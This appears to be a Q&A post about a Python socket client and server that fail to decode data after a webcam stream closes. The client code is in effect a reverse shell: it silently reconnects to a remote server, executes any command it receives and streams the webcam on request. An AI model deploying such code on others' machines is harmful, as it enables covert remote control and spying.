# Why am i recieving a numpy encoded string at server when client is sending 'utf-8' encoding type data throuh python socket

Tags: python, sockets, client-server, opencv

I created a TCP server client socket in Python to stream client webcam on my server machine. All communication is encoded with **'utf-8'**. Everything works fine but whenever i close the streaming window at server and send instruction to release the webcam at client without breaking connection to execute other commands from server i recieve a different encoding type data as response from client which is: **b'\x00\x00,\x94cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\np1\n..**. Receiving it doesn't give any error but printing with `decode('utf-8')`  gives this error: **UnicodeDecodeError: 'utf-8' codec can't decode byte 0xff in position 235: invalid start byte**. I also tried pickle and that also gives error that string is not encoded by pickle and can't be unpickle.
Following is my code:
**server.py**:

```
import socket, os, sys
import pickle, struct, cv2
host = "192.168.xxx.xxx"
port = 444

def create_socket():
    global host, port
    try:
        server = socket.socket()
    except:
        print("[-] Socket Create Error!")
        sys.exit()
    try:
        server.bind((host, port))
        server.listen(10)
        print("[+] Listening...")
    except:
        print("[-] Socket Bind Error!")
        sys.exit()
    try:
        connection, address = server.accept()
        print("[+] Connected with IP | {}".format(address[0]))
    except:
        print("[-] Socket Accept Error!")
        sys.exit()
    return connection, address
def cam_stream(conn):
    data = b""
    payload_size = struct.calcsize(">L")
    while True:
        while len(data) < payload_size:
            data += conn.recv(4096)
        conn.send(str.encode("_")) #tell client streaming is not finished
        packed_msg_size = data[:payload_size]
        data = data[payload_size:]
        msg_size = struct.unpack(">L", packed_msg_size)[0]
        while len(data) < msg_size:
            data += conn.recv(4096)
        frame_data = data[:msg_size]
        data = data[msg_size:]
        frame = pickle.loads(frame_data, fix_imports=True, encoding="bytes")
        frame = cv2.imdecode(frame, cv2.IMREAD_COLOR)
        cv2.imshow('ImageWindow', frame)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    conn.send(str.encode("DONE")) # tell client stream is finished
    cv2.destroyAllWindows()
def send_commands(conn, addr):
    while True:
        command = input("> ")
        if command == "terminate":
            conn.send(str.encode("terminate"))
            conn.close()
            sys.exit()
        if command == "":
            continue
        if command == "webcam":
            conn.send(str.encode(command))
            cam_stream(conn)
            continue
        if command != "":
            conn.send(str.encode(command))
            response = conn.recv(409600)
            print(str(response, 'utf-8'))
connection, address = create_socket()
send_commands(connection, address)
```

**client.py**

```
import socket, os, sys, subprocess
import cv2, pickle, struct
client = socket.socket()
while True:
    try:
        client.connect(("192.168.xxx.xxx", 444))
        break
    except:
        continue
def cam_stream(conn):
    cap = cv2.VideoCapture(0)
    cap.set(3, 320)
    cap.set(4, 240)
    encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]
    while True:
        ret, frame = cap.read()
        result, frame = cv2.imencode('.jpg', frame, encode_param)
        data = pickle.dumps(frame, 0)
        size = len(data)
        conn.send(struct.pack(">L", size) + data)
        reply = conn.recv(2048)
        if reply.decode('utf-8') == "DONE": # ifserver finished the stream
            break
    cap.release()
while True:
    command = client.recv(1024)
    command = str(command, 'utf-8')
    if command == "terminate":
        sys.exit()
    if command == "webcam":
        cam_stream(client)
        continue
    if command != "":
        result = subprocess.getoutput(command)
        client.send(str.encode(result))
```